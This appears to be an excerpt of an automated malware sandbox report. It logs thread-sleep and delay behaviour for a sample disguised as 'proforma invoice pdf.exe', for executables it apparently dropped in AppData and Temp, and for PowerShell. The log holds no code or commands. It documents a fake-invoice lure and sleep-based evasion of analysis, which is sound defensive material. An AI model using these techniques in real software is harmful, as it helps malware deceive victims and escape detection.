Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 598985
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 598381
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597986
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597641
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597407
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597290
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 595321
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594583
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594454
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594323
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594205
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593962
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593734
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593539
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593422
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 593313
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199873
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199653
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199545
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199406
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199269
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199075
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1198664
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1198438
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599855
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599530
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599309
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599202
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598756
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598516
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598391
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598172
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597266
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596826
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596717
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596497
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596170
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596058
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595946
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595828
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595718
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595494
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594225
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594086
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593906
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199766
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199641
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599859
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598858
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598661
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598310
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597922
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597761
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597653
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597466
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597339
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597218
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595850
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595733
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595624
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595514
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595407
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595282
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595157
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 595032
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594916
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594766
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 594456
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593938
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593805
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593703
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593589
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593485
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593360
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593235
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Thread delayed: delay time: 593110

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3458	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 576	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5665	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 992	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Window / User API: threadDelayed 5934	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Window / User API: threadDelayed 3781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Window / User API: threadDelayed 3681
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Window / User API: threadDelayed 6100
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Window / User API: threadDelayed 5863
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Window / User API: threadDelayed 3889
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Window / User API: threadDelayed 6977
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Window / User API: threadDelayed 2795

Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 2548	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 508	Thread sleep count: 3458 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4864	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3848	Thread sleep count: 576 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3024	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3712	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1199818s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1199598s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1199458s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1199297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1199171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -1199054s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599363s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598606s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598165s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -597062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -596944s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -596712s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -596559s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -596352s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -595407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -595282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -595157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -595032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594558s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe TID: 1020	Thread sleep time: -593860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1199826s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1199525s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1199421s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1199310s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1199203s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1199091s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -1198983s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599763s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -598985s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -598381s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597986s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597641s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597516s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597407s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597290s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597172s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -597063s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596844s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -595321s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -594583s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -594454s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -594323s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -594205s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -594078s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -593962s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -593844s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -593734s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -593539s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -593422s >= -30000s
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe TID: 6400	Thread sleep time: -593313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199873s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199765s >= -30000s
